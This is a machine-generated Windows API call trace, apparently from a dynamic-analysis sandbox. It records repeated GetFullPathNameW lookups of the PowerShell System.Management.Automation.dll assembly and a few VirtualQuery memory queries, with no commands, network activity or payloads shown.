	[0353.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.818] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.818] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.819] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.820] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.821] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.821] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.821] VirtualQuery (in: lpAddress=0x10af30, lpBuffer=0x10bdf0, dwLength=0x30 | out: lpBuffer=0x10bdf0*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.821] VirtualQuery (in: lpAddress=0x10afc0, lpBuffer=0x10be80, dwLength=0x30 | out: lpBuffer=0x10be80*(BaseAddress=0x10a000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10b640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] VirtualQuery (in: lpAddress=0x10b9d0, lpBuffer=0x10c890, dwLength=0x30 | out: lpBuffer=0x10c890*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] VirtualQuery (in: lpAddress=0x10b9d0, lpBuffer=0x10c890, dwLength=0x30 | out: lpBuffer=0x10c890*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
